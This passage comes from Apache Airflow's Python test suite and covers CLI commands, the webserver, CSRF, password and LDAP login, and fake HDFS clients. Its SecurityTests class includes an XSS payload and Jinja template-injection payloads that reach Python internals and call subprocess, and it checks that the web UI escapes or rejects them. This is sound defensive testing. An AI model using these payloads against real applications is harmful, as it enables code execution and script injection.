cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
        # Attempt to delete a non-existing connection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
    def _wait_pidfile(self, pidfile):
        while True:
            try:
                with open(pidfile) as f:
                    return int(f.read())
            except (IOError, ValueError):
                # The pid file may not exist yet, or may not contain a pid yet;
                # keep polling until the process has written it.
                sleep(1)
def test_cli_webserver_foreground(self):
import subprocess
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
import subprocess
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import subprocess
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
    # Patch get_num_workers_running to report zero workers, simulating a dead gunicorn master
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
        # Shorten the timeout so this test doesn't take too long
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
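# Note: the CLI tests above drive airflow.bin.cli directly; argv lists are parsed
# with self.parser.parse_args([...]) and the resulting namespace is passed to the
# handler functions (cli.backfill, cli.connections, cli.variables, ...). Only the
# webserver tests spawn real "airflow webserver" subprocesses and watch them via
# pgrep and pid files.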
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except:
            # An exception is expected here since the dag doesn't exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
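        # chart1 and chart2 embed templates that reach into Python object
        # internals, which the sandboxed Jinja environment used for chart
        # rendering is expected to reject with a SecurityError; chart3 references
        # `subprocess`, a name not defined in the template context, so rendering
        # it raises UndefinedError instead.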
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_bash2 = self.dagbag.dags['test_example_bash_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_bash2 = self.dag_bash2.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
        # The HTML should contain data for the last run: a link to the specific
        # run and the text of its date. Query-string ampersands are HTML-escaped
        # in the rendered page, so compare against '&amp;'.
        url = "/admin/airflow/graph?" + urlencode({
            "dag_id": self.dag_bash2.dag_id,
            "execution_date": self.dagrun_bash2.execution_date,
        }).replace("&", "&amp;")
self.assertIn(url, resp_html)
self.assertIn(self.dagrun_bash2.execution_date.strftime("%Y-%m-%d %H:%M"), resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=test_example_bash_operator')
self.assertIn("test_example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=run_this_last&"
"dag_id=test_example_bash_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=run_this_last&'
'dag_id=test_example_bash_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=runme_1&"
"dag_id=test_example_bash_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=test_example_bash_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("run_this_last", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.remove_option("core", "SECURE_MODE")
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
                'modification_time': 1481122343862,
                'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
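# The fake classes above are lightweight stand-ins for real HDFS connections:
# FakeSnakeBiteClient.ls() returns canned listings for a file, an empty
# directory, a non-empty directory and a regex-matched directory, and raises
# FakeSnakeBiteClientException for unknown paths. They are presumably consumed
# by HDFS sensor tests elsewhere in this module.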
